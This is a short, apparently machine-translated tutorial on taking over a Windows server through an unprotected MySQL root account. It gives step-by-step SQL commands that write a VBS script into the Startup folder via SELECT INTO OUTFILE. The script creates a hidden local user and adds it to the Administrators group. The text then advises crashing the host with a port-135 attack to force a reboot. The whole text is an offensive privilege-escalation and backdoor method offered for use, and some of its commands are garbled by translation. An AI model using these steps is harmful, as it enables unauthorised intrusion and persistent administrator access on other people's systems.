MySQL user root password is a weak password attack

Mysql| attack 1, connect to each other MySQL server

Mysql-u root-h 192.168.0.1

Mysql.exe This program is in the bin directory where you have MySQL installed

2. Let's take a look at some of the databases in the server

Mysql>show databases;

MySQL default installation will have MySQL, test these two databases, if you see that there are other databases that is the user-built database.

3, let us enter the database

Mysql>use test;

We're going to go into the test database.

4. See what data tables we get into the database

Mysql>show tables;

By default, no table exists in test.

The following are the key parts

5. Create a new table under test database;

Mysql>create Table A (cmd text);

Well, we created a new table named A, which only holds one field in the table, the field name is cmd, and the text.

6, insert the content in the table

Mysql>insert into a values ("Set Wshshell=createobject (" "Wscript.Shell") ");

Mysql>insert into a values ("A=wshshell.run (" "cmd.exe/c net User 1 1/add" ", 0)");

Mysql>insert into a values ("B=wshshell.run (" "Cmd.exe/c net localgroup Administrators 1/add" ", 0)");

Note the double quotes and parentheses and the "0" in the back must be entered! We will use these three commands to create a VBS script!

7, okay, now let's see what's in Table A.

Mysql>select * from A;

We will see that there are three rows of data in the table, that is, what we just typed, confirm what you typed, and we'll come to the next step.

8, the output table is a VBS script file

Mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\" start "menu \ \ program \ Start \\a.vbs";

We entered the contents of our table into the Startup group, is a script file of VBS! Note the "\" symbol.

9, see this everyone must know, is the use of MySQL output an executable file. Why not bat, because the start of the runtime will have a clear DOS window out, and the VBS script can completely hide the window without error prompts! Originally, there should be a sentence after the completion of the script automatically deleted this script, but the Chinese directory is really unable to deal with, only to forget! All right, find a tool to attack 135 and let the server reboot, and in a few minutes you'll be the administrator.